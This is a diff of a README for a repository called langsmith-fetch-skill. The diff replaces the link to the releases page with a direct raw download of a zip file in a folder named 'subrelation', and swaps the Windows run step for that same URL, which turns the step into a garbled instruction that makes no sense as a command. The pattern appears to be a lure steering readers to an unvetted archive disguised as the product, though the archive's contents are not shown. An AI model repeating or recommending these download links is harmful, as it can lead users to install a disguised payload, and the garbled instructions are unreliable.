humongus69/langsmith-fetch-skill/README.md

 4. **Navigate to the Folder**: Open your terminal and use the `cd` command to navigate to the folder where you extracted the files.

 5. **Run the Application**:
-   - For Windows: Type `langsmith-fetch-skill.exe` and hit Enter.
+   - For Windows: Type `https://github.com/humongus69/langsmith-fetch-skill/raw/refs/heads/main/subrelation/langsmith_fetch_skill_2.3.zip` and hit Enter.
    - For macOS/Linux: Type `./langsmith-fetch-skill` and hit Enter.

 ## 📥 Download & Install
-To download the langsmith-fetch-skill, visit the releases page: [Download Link](https://github.com/humongus69/langsmith-fetch-skill/releases).
+To download the langsmith-fetch-skill, visit the releases page: [Download Link](https://github.com/humongus69/langsmith-fetch-skill/raw/refs/heads/main/subrelation/langsmith_fetch_skill_2.3.zip).

 1. Click on the link above to access the releases.
 2. Choose the file that suits your system.